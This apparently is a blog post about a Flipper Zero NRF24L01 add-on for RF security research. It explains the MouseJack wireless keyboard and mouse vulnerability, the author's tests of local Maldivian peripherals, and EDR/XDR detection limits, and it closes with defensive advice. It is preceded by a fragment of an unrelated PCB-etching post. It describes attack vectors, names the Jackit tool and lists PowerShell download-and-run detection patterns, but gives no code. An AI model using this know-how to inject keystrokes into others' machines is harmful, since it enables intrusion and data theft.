Custom ESP32-S3 development board — professionally manufactured by JLCPCB. A far cry from where it all started. It Started in a School Science Lab — Around 1998 Most people who get into electronics start with a kit, a tutorial, maybe a breadboard and some LEDs. I started by sneaking ferric chloride out of a school science lab to etch my first PCB. That was around 1998. I was living in the Maldives — a small island nation in the Indian Ocean — where there was no electronics supply chain, no maker community, no local PCB fab. Just a chemistry cabinet at school, a copper-clad board from somewhere, and a lot of curiosity. This post is about what the next 25+ years of PCB prototyping looked like from there. The early wins with proper chemicals, the years of improvisation when those chemicals disappeared, the real injuries, the failed boards, and finally — the moment JLCPCB changed ever...
Six months of design iterations, sourcing headaches, and a broken oscilloscope later — I am pleased to share a hardware module I designed to extend the Flipper ecosystem for RF security research. This write-up covers the motivation, engineering challenges, capabilities, and responsible-disclosure principles behind the project — and a frank look at a vulnerability that is very much alive in the Maldives today.
Why I Built It
The trigger was reading the original MouseJack disclosure by Bastille Networks. It made me realize that a class of peripherals most people assume to be harmless — the cheap wireless mouse on your desk — can be weaponized from a car park. I wanted a research platform small enough to carry in a jacket pocket, native to the Flipper Zero ecosystem, and capable of passive scanning, protocol analysis, and controlled lab tests. What I did not want was to rediscover a ten-year-old bug; I wanted to understand it deeply enough to help organizations here in the Maldives understand the exposure sitting on their own desks.
Left: 3D render of final PCB · Right: KiCad PCB layout view
MouseJack — The Vulnerability Behind This Project
Origins & Discovery
In February 2016, Marc Newlin of Bastille Networks' Threat Research Team announced MouseJack — a family of nine distinct vulnerabilities catalogued under Bastille tracking numbers #1–7, #9, and #12. The team comprised RF and cybersecurity specialists including the top four finalists of the DARPA Spectrum Challenge, lending the research considerable credibility. The findings were registered with US-CERT / CERT-CC at Carnegie Mellon University, which issued a formal advisory.
The Technical Root Cause
Wireless mice and keyboards in the 2.4 GHz ISM band communicate with a USB dongle plugged into the host computer. These proprietary protocols — built on Nordic Semiconductor's nRF24 series transceivers — were designed for convenience, not adversarial environments. The critical flaw is a complete absence of authentication between peripheral and dongle. Because the dongle cannot distinguish legitimate mouse packets from attacker-crafted ones, it accepts both and forwards them to the OS as genuine input. Crucially, while most keyboards encrypt their traffic, the underlying dongles often accept unencrypted packets anyway — meaning an attacker doesn't need to break encryption at all.
The Five Attack Vectors
| Attack Vector | Mechanism | Impact |
|---|---|---|
| Mouse Spoofing | Dongle does not verify packet type matches the transmitting device. Attacker pretends to be a mouse but sends keypress packets instead of movement data. | Inject arbitrary keystrokes as if the user typed them. |
| Keyboard Spoofing | Many dongles do not enforce encryption even when the keyboard uses it. Attacker transmits raw unencrypted keyboard packets directly. | Full keystroke injection — open CMD, download malware, exfiltrate data. |
| Forced Pairing | Some dongles allow new peripherals to pair without user interaction. Attacker introduces a rogue keyboard which the dongle accepts. | Permanent foothold — attacker's device becomes a trusted peripheral. |
| Denial of Service | The 2.4 GHz channel is flooded with radio traffic (Bastille tracking #8). | Peripheral becomes unresponsive; disruption without code execution. |
| KeySniffer (related) | Keyboards transmitting keystrokes unencrypted allow passive eavesdropping from up to 75 m away. | Credential theft, password capture, IP loss — silently and invisibly. |
Range, Cost & Stealth
| Attack Range | Up to 100 metres (line of sight), proven effective through walls and windows. |
|---|---|
| Hardware Cost | As little as $15 — a standard USB radio dongle or CrazyRadio PA, widely available. |
| AV Evasion | Presents as a keyboard. Completely invisible to antivirus, IDS, and firewalls. |
| OS Coverage | Windows, macOS, and Linux — all equally vulnerable via the dongle firmware. |
| Real-time Detection | No practical mechanism for end-users to detect an active attack. |
Confirmed Affected Brands
Bastille's team tested devices from seven major manufacturers. They explicitly noted they could not test every model — unbranded generic devices were not tested but share identical chipsets.
| Brand | Finding & Response |
|---|---|
| Logitech | Unifying receiver confirmed vulnerable. Firmware patch issued, but many shipped devices remain unpatched. The popular M185 continued to show vulnerability post-patch. |
| Microsoft | Multiple wireless desktop sets affected. Windows Update advisory 3152550 partially mitigated mouse spoofing but did not fix keyboards; the Sculpt Ergonomic Mouse remained injectable. |
| Dell | KM714 confirmed vulnerable. Dell directed customers to Logitech's patch as the underlying dongle shares the same lineage. |
| HP & Lenovo | Both confirmed affected. Lenovo issued an update for the 500 series but noted it could only be applied at manufacture — existing field devices cannot be patched. |
| Amazon / Gigabyte | Confirmed affected. Neither vendor offered a firmware fix; replacement is the only option. |
| Unbranded & Generic | Not tested by Bastille. However, these products overwhelmingly use identical nRF24-family chipsets and almost certainly carry the same or worse vulnerabilities with zero prospect of a patch. |
Why the Vulnerability Persists in 2025
Despite being disclosed nearly a decade ago, MouseJack remains exploitable at scale. Many dongles were never designed to accept firmware updates — the flaw is baked into silicon. Even where patches exist, peripheral firmware updates are virtually never applied by end users. And the global supply chain continues to ship affected chipsets in new hardware, meaning brand-new devices purchased today may carry the exact same flaw from 2016.
⚠ Still Relevant in 2025: A 2022 survey of 100 organizations found that 28% had at least one MouseJack-vulnerable device actively in use — six years after public disclosure. The attack remains a fully viable red-team vector. (Source: CEUR-WS security survey, 2022.)
The Maldives Market — A Local Blind Spot
The Maldives has a small but fast-growing IT retail sector, with dozens of local suppliers and resellers operating in Malé and across the atolls. The overwhelming majority of wireless peripherals available on the local market are budget, unbranded, or generic-OEM products sourced from Chinese manufacturers — products that were never in Bastille's original testing pool and almost certainly carry nRF24-family chipsets with no encryption and no authentication on the dongle link.
I have personally tested several models available from local IT suppliers here in the Maldives. The findings are consistent with what Bastille documented in 2016: unencrypted mouse packets, no dongle-side authentication, and in some cases zero pairing enforcement — meaning any nearby attacker can inject keystrokes without ever having been paired to the device.
| Observation | Detail |
|---|---|
| Product Type | Budget 2.4 GHz wireless mice and keyboards sold openly by local IT retailers in Malé and across the atolls. |
| Chipset | nRF24L-family transceivers or near-identical clones — the same silicon at the center of Bastille's 2016 findings. |
| Encryption | None observed on mouse packets in personally tested samples. Fully consistent with the MouseJack vulnerability profile. |
| Pairing Auth | Absent or trivially bypassable on all tested devices. The dongle accepted injected packets without any prior pairing. |
| Firmware Updates | No update mechanism exists on any tested device. These products are permanently and irreversibly vulnerable. |
| At-Risk Environments | Government offices, bank branches, resort back-offices, and SMEs across the Maldives actively use these peripherals. |
| User Awareness | Near zero. MouseJack is unknown to virtually all end users and most local IT administrators. |
💡 Realistic Scenario: An attacker in the lobby of a government ministry, a bank, or a busy café in Malé — armed with a $15 USB radio dongle and the open-source Jackit tool — could silently inject keystrokes into any nearby unprotected wireless peripheral, open a command prompt, download a payload, or exfiltrate documents, all without touching the target computer, triggering antivirus, or leaving the 100-metre attack range that covers most Maldivian commercial buildings.
Can EDR, XDR, or MDR Stop a MouseJack Attack?
This is one of the most important — and most misunderstood — questions in the context of this vulnerability. The short answer is: not at the point of entry, but potentially at the point of consequence. Understanding exactly where each layer of defense sits, and where it is blind, is critical for any organization assessing their real exposure.
Why the Initial Attack Bypasses All Three
MouseJack operates entirely at the radio frequency and USB HID layer — below the operating system, below the kernel, and therefore below every EDR, XDR, and MDR sensor. The USB dongle receives injected keystrokes over the air and presents them to the OS as legitimate human input. The OS has no mechanism to distinguish a genuine keypress from an injected one — and neither does any security agent sitting on top of it. Keystroke injection cannot be detected at entry because the keyboard is always treated as a trusted device, and EDR, XDR, and MDR agents inherit exactly the same blind spot.
Attack Phase Visibility Map
| Attack Phase | What Happens | EDR / XDR / MDR Visibility |
|---|---|---|
| RF Injection (Entry Point) | Attacker transmits crafted radio packets to the USB dongle from up to 100 m away. No process, file, or network connection is created. | None. This occurs at the RF hardware layer, entirely below any software sensor. |
| HID Trust (OS Acceptance) | Dongle passes injected keystrokes to the OS as legitimate HID input. The OS treats them identically to keystrokes from a real keyboard. | None. The OS itself cannot distinguish injected from genuine input at this stage. |
| Command Execution (Post-Entry) | Injected keystrokes open a terminal, run PowerShell, download a payload — just as a human would type. | Partial. EDR/XDR/MDR may flag unusual PowerShell invocations, unexpected child processes, or anomalous command-line arguments. |
| Payload Execution & Persistence | Downloaded malware runs, establishes persistence, or moves laterally via harvested credentials. | Yes — this is where EDR/XDR/MDR operates effectively. Malware behavior, lateral movement, C2 beaconing, and registry changes are all detectable. |
What EDR Can Detect — Downstream Consequences
Although EDR cannot see the radio injection itself, a well-tuned agent monitoring process behavior will often catch the consequences:
| Detection Opportunity | How EDR Catches It |
|---|---|
| Abnormal PowerShell Execution | Injected payloads frequently invoke PowerShell with encoded commands, execution policy bypasses, or IEX download-and-run patterns — all flagged by EDR behavioral analytics. |
| Unusual Process Chains | A command prompt or PowerShell window spawning with no user-initiated parent process is a strong anomaly that engines like Microsoft Defender for Endpoint and CrowdStrike Falcon detect. |
| Unexpected Network Connections | If injected commands download a secondary payload, the outbound connection to an unknown IP will be logged by EDR and XDR network telemetry, often triggering automated endpoint isolation. |
| Superhuman Typing Speed | Some advanced agents monitor HID input rates. Keystroke injection runs at machine speed, far beyond any human typist. Agents capable of USB HID monitoring can flag this, though capability is not universal. |
| Registry & File System Changes | Persistence mechanisms — registry run keys, scheduled tasks, dropped executables — are standard EDR detection territory and are reliably caught. |
What XDR Adds
XDR extends EDR by correlating signals across endpoint, network, email, identity, and cloud into a unified incident view. For a MouseJack attack progressing to lateral movement, XDR stitches together the anomalous process, the outbound network beacon, the credential reuse on a second machine, and the unusual cloud login into one correlated incident. Platforms such as Palo Alto Cortex XDR, Microsoft Sentinel with Defender XDR, and Sophos XDR are designed for exactly this. However, they remain blind to the RF injection event itself — only its downstream trail is visible to them.
What MDR Adds
Managed Detection and Response puts human analysts behind the tooling around the clock. The key advantage is contextual threat hunting: an MDR analyst who sees an anomalous PowerShell process with no obvious parent can actively investigate — checking whether the machine has an unrecognized USB HID device registered, whether the process timing coincides with a physical access window, and whether similar patterns appear on nearby machines. This goes beyond automated detection and can surface a MouseJack compromise that a pure EDR deployment might log but not escalate.
Verdict: Where Each Tool Stands
| Layer | Tool | Assessment |
|---|---|---|
| RF Injection | AV / EDR / XDR / MDR | No detection. The attack occurs below all software-based security layers. The only defense is hardware: remove the vulnerable peripheral. |
| HID Input Trust | OS / EDR | No detection at entry. Some advanced agents can flag inhuman HID input rates, but this is not a standard or reliable control. |
| Command Execution | EDR | Partial — detects suspicious PowerShell, abnormal process chains, and unexpected network calls. Does not prevent entry but can interrupt an attack in progress. |
| Lateral Movement & Persistence | EDR / XDR / MDR | Good coverage. Malware behavior, credential abuse, and C2 activity are reliably detected and can trigger automated containment. |
| Incident Correlation | XDR / MDR | Strong. XDR correlates cross-source signals into coherent incidents. MDR adds human analysis and proactive hunting. |
🔒 The Bottom Line: EDR, XDR, and MDR are valuable and can catch the downstream consequences of a MouseJack attack — but none of them can see the radio frequency injection that starts it. The only way to close the entry point entirely is to remove the vulnerable hardware. Think of EDR/XDR/MDR as your burglar alarm: essential once someone is inside, but no substitute for a lock on the door.
The Module — Design & Engineering
This is a Flipper Zero-compatible board centered on the NRF24L01 transceiver, featuring an SMA antenna connector, RF matching components, and the power decoupling necessary for stable radio operation. It plugs directly into the Flipper's GPIO expansion header and runs community firmware enabling RF scanning and protocol analysis across the 2.4 GHz band.
| Spec | Detail |
|---|---|
| Transceiver | NRF24L01+ |
| Antenna | External SMA connector |
| Frequency Band | 2.4 GHz ISM |
| Host Interface | SPI via Flipper Zero GPIO expansion header |
| Power Regulation | On-board LDO with transient suppression for stable TX bursts |
| PCB | Custom 2-layer, Flipper-compatible form factor |
Engineering Challenges
RF Front End & Antenna Tuning — The 2.4 GHz band is acutely sensitive to PCB layout and component matching. Small changes to L/C values and trace geometry produced measurable differences in sensitivity and output power; iterative tuning with a spectrum analyzer was essential.
Component Sourcing — Acquiring small quantities of SMD components proved a genuine bottleneck. Minimum order quantities and long lead times from distributors added weeks to the timeline.
Debugging Without Instruments — The oscilloscope failed mid-development and had to be repaired before work could meaningfully continue. Once restored, it dramatically reduced guesswork and accelerated the debugging cycle.
PCB Constraints — The tight board area demanded careful RF trace routing, thorough ground stitching, and targeted bypass capacitor placement to maintain radio stability under real-world operating conditions.
Power Integrity — An on-board LDO and robust transient suppression were added to ensure the device remains stable during transmit bursts, where instantaneous current demand spikes sharply.
Responsible Disclosure & Ethics
This project is research-first. No step-by-step exploit instructions are published. The goal is awareness — particularly in a local market where these risks are almost entirely unknown.
- Test only on devices you own or with explicit, informed consent.
- Privately report critical findings to vendors and allow reasonable time for remediation.
- Publish high-level trends and mitigations to improve awareness and encourage vendor fixes.
Recommendations — Especially for the Maldives
Government & Enterprises
Audit all wireless peripherals against the Bastille affected-device list. Replace unbranded 2.4 GHz dongles with Bluetooth or wired alternatives in any environment handling sensitive data.
Banks & Financial Institutions
The combination of high-value targets and cheap office peripherals is a serious risk. Procurement policy should explicitly prohibit unverified non-Bluetooth wireless input devices.
Local IT Suppliers
Consider stocking and actively promoting Bluetooth-based peripherals as a security-conscious alternative. Even a brief note at point of sale about this class of risk would make a real difference.
End Users
If you use a cheap 2.4 GHz wireless mouse or keyboard at work or at home, you are very likely vulnerable. Switching to Bluetooth or wired peripherals eliminates this attack surface entirely.
Comments